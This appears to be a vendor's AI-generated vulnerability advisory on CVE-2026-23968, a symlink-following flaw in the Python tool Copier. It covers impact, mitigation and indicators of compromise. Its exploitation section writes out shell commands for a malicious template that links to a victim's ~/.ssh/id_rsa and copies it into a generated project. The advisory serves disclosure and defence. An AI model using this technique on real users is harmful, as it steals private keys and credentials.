CVE-2026-23968: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-23968 is a UNIX symbolic link (symlink) following vulnerability in Copier, a Python-based project templating tool, that allows a malicious template author to include arbitrary files and directories from outside the template root in a generated project. The flaw affects all Copier versions prior to 9.11.2 and was published on January 21, 2026, with a patch released in version 9.11.2. It carries a CVSS v3.1 base score of 5.5 (Medium) and a CVSS v4.0 base score of 6.8 (Medium) (GitHub Advisory, Copier Advisory).

Technical details

The root cause is improper handling of symbolic links during template rendering, classified as CWE-61 (UNIX Symbolic Link Following). When _preserve_symlinks: false (Copier's default setting), Copier resolves symlinks during the copy operation but fails to verify that the resolved target path remains within the template's local clone directory. A malicious template author can embed symlinks pointing to files or directories outside the template root (e.g., ln -s ../secret.txt stolen-secret.txt), and when a victim runs copier copy, the resolved content of those external files is written into the generated project output directory. The fix, applied in commit b3a7b37, adds a check in copier/_main.py that raises a ForbiddenPathError if a symlink resolves to a path outside template.local_abspath (GitHub Commit, GitHub Advisory).

Impact

Successful exploitation results in a high confidentiality impact: sensitive files accessible on the victim's filesystem — such as SSH private keys, API tokens, environment files, or other credentials stored in well-known locations — can be silently copied into the generated project output. There is no integrity or availability impact. If the victim subsequently publishes the generated project to a public repository (e.g., GitHub), the attacker can retrieve the exfiltrated secrets, making this a supply-chain-style data exfiltration attack that requires no elevated privileges on the victim's system (Copier Advisory, GitHub Advisory).

Exploitability

A proof-of-concept demonstrating the vulnerability is publicly documented in the official security advisory, showing exact shell commands to reproduce the symlink-based file and directory exfiltration (Copier Advisory). Exploitation requires user interaction — the victim must run copier copy against a malicious template — but no special privileges are needed. The EPSS score is approximately 0.019% (15th percentile), indicating low near-term exploitation probability. There is no evidence of in-the-wild exploitation or CISA KEV catalog inclusion at this time (GitHub Advisory).

Exploitation steps

  1. Craft a malicious template: The attacker creates a Copier template repository containing symlinks that point to sensitive files or directories outside the template root. For example:
mkdir src/
pushd src/
ln -s ~/.ssh/id_rsa stolen-ssh-key
popd
  1. Publish the template: The attacker hosts the malicious template on a public platform (e.g., GitHub, GitLab) and promotes it as a legitimate project scaffold.
  2. Victim runs Copier: The victim, trusting the template (since it does not require --UNSAFE/--trust flags), runs:
uvx copier copy https://github.com/attacker/malicious-template dst/
  1. Symlink resolution exfiltrates files: Copier resolves the symlinks with _preserve_symlinks: false (default) and copies the content of the targeted external files into the dst/ output directory.
  2. Attacker retrieves secrets: The victim pushes the generated project to a public repository, and the attacker accesses the exfiltrated sensitive files (e.g., SSH keys, credentials) from the public repository (Copier Advisory, GitHub Advisory).

Indicators of compromise

  • File System: Unexpected files in the Copier-generated output directory that match names or contents of sensitive files from the host system (e.g., SSH keys, .env files, credential stores); presence of symlinks in a Copier template repository pointing to paths outside the template directory.
  • Logs: Version control commit history showing files with contents matching local secrets (e.g., PEM-formatted private keys, API tokens) in a generated project repository.
  • Process: Copier process (prior to version 9.11.2) completing without error when processing a template containing symlinks that resolve outside the template root — patched versions raise a ForbiddenPathError in this scenario (GitHub Commit).

Mitigation and workarounds

Upgrade Copier to version 9.11.2 or later, which introduces a ForbiddenPathError for symlinks resolving outside the template root when _preserve_symlinks: false (GitHub Commit, GitHub Advisory). No official workaround is provided for unpatched versions. As a precautionary measure, users should review the contents of generated project directories before committing or publishing them, and exercise caution when using templates from untrusted or unverified sources (Copier Advisory).

Community reactions

The vulnerability was discovered and reported by researcher sisp, with remediation review by cbrown1234, and published through the official Copier GitHub security advisory process on January 21, 2026 (Copier Advisory). Red Hat also tracked the vulnerability and published a CVE entry (GitHub Advisory). Community discussion was limited, with no significant media coverage or notable researcher commentary beyond the advisory itself.

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management